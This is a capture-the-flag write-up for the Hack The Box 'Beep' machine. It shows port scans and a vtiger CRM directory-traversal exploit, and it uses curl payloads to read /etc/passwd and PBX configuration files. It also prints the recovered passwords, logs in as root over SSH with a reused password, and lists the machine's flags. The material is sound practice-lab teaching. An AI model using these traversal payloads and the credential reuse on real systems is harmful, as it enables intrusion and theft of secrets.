Nmap TCP results

Nmap scan report for 10.10.10.7
Host is up, received user-set (0.13s latency).
Scanned at 2020-07-16 17:03:26 CEST for 720s
Not shown: 988 closed ports
Reason: 988 resets
PORT      STATE SERVICE    REASON         VERSION
22/tcp    open  ssh        syn-ack ttl 63 OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAI04jN+Sn7/9f2k+5UteAWn8KKj3FRGuF4LyeDmo/xxuHgSsdCjYuWtNS8m7stqgNH5edUu8vZ0pzF/quX5kphWg/UOz9weGeGyzde5lfb8epRlTQ2kfbP00l+kq9ztuWaXOsZQGcSR9iKE4lLRJhRCLYPaEbuxKnYz4WhAv4yD5AAAAFQDXgQ9BbvoxeDahe/ksAac2ECqflwAAAIEAiGdIue6mgTfdz/HikSp8DB6SkVh4xjpTTZE8L/HOVpTUYtFYKYj9eG0W1WYo+lGg6SveATlp3EE/7Y6BqdtJNm0RfR8kihoqSL0VzKT7myerJWmP2EavMRPjkbXw32fVBdCGjBqMgDl/QSEn2NNDu8OAyQUVBEHrE4xPGI825qgAAACANnqx2XdVmY8agjD7eFLmS+EovCIRz2+iE+5chaljGD/27OgpGcjdZNN+xm85PPFjUKJQuWmwMVTQRdza6TSp9vvQAgFh3bUtTV3dzDCuoR1D2Ybj9p/bMPnyw62jgBPxj5lVd27LTBi8IAH2fZnct7794Y3Ge+5r4Pm8Qbrpy68=
|   2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4SXumrUtyO/pcRLwmvnF25NG/ozHsxSVNRmTwEf7AYubgpAo4aUuvhZXg5iymwTcZd6vm46Y+TX39NQV/yT6ilAEtLbrj1PLjJl+UTS8HDIKl6QgIb1b3vuEjbVjDj1LTq0Puzx52Es0/86WJNRVwh4c9vN8MtYteMb/dE2Azk0SQMtpBP+4Lul4kQrNwl/qjg+lQ7XE+NU7Va22dpEjLv/TjHAKImQu2EqPsC99sePp8PP5LdNbda6KHsSrZXnK9hqpxnwattPHT19D94NHVmMHfea9gXN3NCI3NVfDHQsxhqVtR/LiZzpbKHldFU0lfZYH1aTdBfxvMLrVhasZcw==
25/tcp    open  smtp       syn-ack ttl 63 Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       syn-ack ttl 63 Apache httpd 2.2.3
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       syn-ack ttl 63 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: PIPELINING STLS EXPIRE(NEVER) IMPLEMENTATION(Cyrus POP3 server v2) UIDL TOP AUTH-RESP-CODE USER LOGIN-DELAY(0) RESP-CODES APOP
111/tcp   open  rpcbind    syn-ack ttl 63 2 (RPC #100000)
143/tcp   open  imap       syn-ack ttl 63 Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: NAMESPACE RIGHTS=kxte OK IMAP4 NO Completed URLAUTHA0001 ATOMIC BINARY X-NETSCAPE STARTTLS LISTEXT IDLE CONDSTORE THREAD=ORDEREDSUBJECT IMAP4rev1 THREAD=REFERENCES QUOTA ANNOTATEMORE CATENATE UIDPLUS SORT=MODSEQ SORT MAILBOX-REFERRALS ACL MULTIAPPEND LITERAL+ UNSELECT RENAME LIST-SUBSCRIBED ID CHILDREN
443/tcp   open  ssl/https? syn-ack ttl 63
|_ssl-date: 2020-07-16T15:15:23+00:00; +2m32s from scanner time.
993/tcp   open  ssl/imap   syn-ack ttl 63 Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       syn-ack ttl 63 Cyrus pop3d
3306/tcp  open  mysql      syn-ack ttl 63 MySQL (Too many connections)
4445/tcp  open  upnotifyp? syn-ack ttl 63
10000/tcp open  http       syn-ack ttl 63 MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 2m31s

The HTTPS uses a very old protocols, like SSLv3 and TLS 1.0. To allow some tools, that report SSL error, to use these protocols we have to modify the openssl configuration:

sed -i 's,^\(MinProtocol[ ]*=\).*,\1'TLSv1.0',g' /etc/ssl/openssl.cnf
sed -i 's,^\(CipherString[ ]*=\).*,\1'DEFAULT@SECLEVEL=1',g' /etc/ssl/openssl.cnf

Directory/Files on the 443 vhost

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 20469

Error Log: /opt/dirsearch/logs/errors-20-07-17_12-23-26.log

Target: https://10.10.10.7/

[12:23:27] Starting: 
[12:26:34] 301 -  309B  - /admin  ->  https://10.10.10.7/admin/
[12:31:36] 301 -  311B  - /configs  ->  https://10.10.10.7/configs/
[12:34:59] 200 -  894B  - /favicon.ico
[12:37:02] 301 -  308B  - /help  ->  https://10.10.10.7/help/
[12:37:48] 301 -  310B  - /images  ->  https://10.10.10.7/images/
[12:39:34] 301 -  308B  - /lang  ->  https://10.10.10.7/lang/
[12:39:51] 301 -  308B  - /libs  ->  https://10.10.10.7/libs/
[12:40:30] 301 -  308B  - /mail  ->  https://10.10.10.7/mail/
[12:41:33] 301 -  311B  - /modules  ->  https://10.10.10.7/modules/
[12:43:38] 301 -  309B  - /panel  ->  https://10.10.10.7/panel/
[12:46:02] 301 -  314B  - /recordings  ->  https://10.10.10.7/recordings/
[12:46:41] 200 -   28B  - /robots.txt
[12:49:01] 301 -  310B  - /static  ->  https://10.10.10.7/static/
[12:50:16] 301 -  310B  - /themes  ->  https://10.10.10.7/themes/
[12:51:33] 301 -  307B  - /var  ->  https://10.10.10.7/var/
[12:52:00] 301 -  313B  - /vtigercrm  ->  https://10.10.10.7/vtigercrm/

The VM is running the software/services:

OpenSSH 4.3 
Postfix ?
Apache 2.2.3
Cyrus pop3d 2.3.7
Nfs ?
Cyrus imapd 2.3.7
Mysql ?
Asterisk Call Manager 1.1
MiniServ 1.570 (Webmin httpd)
FreePBX 2.8.1.4 and/or 2.5 ?
vtiger CRM 5.1.0

The Vtiger software is vulnerable to directory traversal (https://www.cvedetails.com/cve/CVE-2012-4867/):

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  curl -k "https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00" 
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash

it's quite obvious that, knowing that usually the flag is in the user's home, you can try to use the vulnerability to read the user.txt file (and it works) but I prefer to try to enter the machine

We can search for information helpful to break inside the system. Looking at the SIP configuration we found:

 lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  curl -k "https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/cdr_mysql.conf%00" 
; 
; Note - if the database server is hosted on the same machine as the 
; asterisk server, you can achieve a local Unix socket connection by 
; setting hostname = localhost
; 
; port and sock are both optional parameters.  If hostname is specified 
; and is not "localhost", then cdr_mysql will attempt to connect to the 
; port specified or use the default port.  If hostname is not specified 
; or if hostname is "localhost", then cdr_mysql will attempt to connect 
; to the socket file specified by sock or otherwise use the default socket 
; file. 
; 
[global] 
hostname = localhost
dbname=asteriskcdrdb 
password = jEhdIekWmdjE
user = asteriskuser
userfield=1
;port=3306 
;sock=/tmp/mysql.sock

Unfortunately, it is not possible to connect directly to the db because an IP filter. Proceeding with the exploration you will find other credentials for other services

 lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  curl -k "https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/voicemail.conf%00" 
[general]
#include vm_general.inc
#include vm_email.inc
[default]

233 => ,Fanis Papafanopoulos,,,attach=no|saycid=no|envelope=no|delete=no
 lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  
 lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  curl -k "https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/sip_additional.conf%00" 
;--------------------------------------------------------------------------------;
; Do NOT edit this file as it is auto-generated by FreePBX. All modifications to ;
; this file must be done via the web gui. There are alternative files to make    ;
; custom modifications, details at: http://freepbx.org/configuration_files       ;
;--------------------------------------------------------------------------------;
;

[233]
deny=0.0.0.0/0.0.0.0
secret=fji#REH9i##nrIIOnjndwP923UEj
dtmfmode=rfc2833
canreinvite=no
context=from-internal
host=dynamic
type=friend
nat=yes
port=5060
qualify=yes
callgroup=
pickupgroup=
dial=SIP/233
mailbox=233@default
permit=0.0.0.0/0.0.0.0
callerid=device <233>
callcounter=yes
faxdetect=no

finally the password to access the Elastix administration interface is found (as admin)

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  curl -k --silent "https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00" | grep -v "^#"|grep .
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin
AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin 
FOPWEBROOT=/var/www/html/panel
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
AUTHTYPE=database
AMPADMINLOGO=logo.png
AMPEXTENSIONS=extensions
ENABLECW=no
ZAP2DAHDICOMPAT=true
MOHDIR=mohmp3
AMPMODULEXML=http://mirror.freepbx.org/
AMPMODULESVN=http://mirror.freepbx.org/modules/
AMPDBNAME=asterisk
ASTETCDIR=/etc/asterisk
ASTMODDIR=/usr/lib/asterisk/modules
ASTVARLIBDIR=/var/lib/asterisk
ASTAGIDIR=/var/lib/asterisk/agi-bin
ASTSPOOLDIR=/var/spool/asterisk
ASTRUNDIR=/var/run/asterisk
ASTLOGDIR=/var/log/asterisk

elastix

With the same password it is possible to access the FreePBX (FreePBX 2.8.1.4) interface as admin

freepbx

And the recording list (FreePBX 2.5)

recordings

Now, there is a menu item "Java SSH" clicking on it does not open a ssh shell, but this phrase lead me to think the admin password would work also as the root ssh password

ssh

and it works!

 lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7
root@10.10.10.7's password: 
Last login: Sat Jul 18 00:53:04 2020 from 10.10.16.106

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# cat /home/fanis/user.txt 
aeff3def0c765c2677b94715cffa73ac
[root@beep ~]# cat root.txt 
d88e006123842106982acce0aaf453f0
[root@beep ~]# 

- lilloX

Share on: Diaspora*TwitterFacebookLinkedInHackerNewsEmailReddit


Comments

comments powered by Disqus